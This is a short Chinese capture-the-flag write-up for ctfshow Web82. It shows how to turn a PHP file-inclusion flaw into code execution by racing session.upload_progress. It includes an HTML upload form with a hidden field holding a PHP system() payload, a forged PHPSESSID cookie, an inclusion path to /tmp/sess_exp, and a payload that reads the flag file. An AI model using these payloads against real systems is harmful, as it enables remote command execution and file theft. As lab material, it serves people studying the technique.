文件包涵条件竞争(ctfshow82)

Web82

利用 session.upload_progress 包含文件漏洞

<!DOCTYPE html>

<html>

<body>

<form action="https://09558c1b-9569-4abd-bf78-86c4a6cb6608.challenge.ctf.show//" method="POST" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />

<input type="file" name="file" />

<input type="submit" value="submit" />

</form>

</body>

</html>

<?php

session_start();

?>

修改url地址,修改命令

上传文件bp抓包

添加cookie,清除参数

Cookie: PHPSESSID=exp

?file=/tmp/sess_exp

抓包发送到攻击模块

开始攻击

<?php system('cat fl0g.php'); ?>

相关推荐
Bruce_Liuxiaowei1 天前
基于HTA的Meterpreter反向Shell攻击实验
网络·windows·经验分享·网络安全·渗透测试
楠目1 天前
PHP 文件包含以及PHP伪协议
网络安全
QuantumRedGuestk1 天前
CS工具正反向渗透靶场实操解读【文图】
网络安全·内网渗透·cs·靶场渗透
Hacker_seagull1 天前
青少年CTF练习平台~Upload3
网络安全
内心如初1 天前
03_等保系列之1.0和2.0对比
网络安全·等保测评·等保测评从0-1·等保测评笔记
内心如初1 天前
04_等保系列之云等保
网络安全·等保测评·等保测评从0-1·等保测评笔记
小小代码狗1 天前
PHP伪协议和文件包含
网络·网络安全·php
吃不得辣条1 天前
渗透学习小结
学习·网络安全
恃宠而骄的佩奇1 天前
APP客户端安全评估思路及工具分享
测试工具·安全·网络安全·app客户端安全评估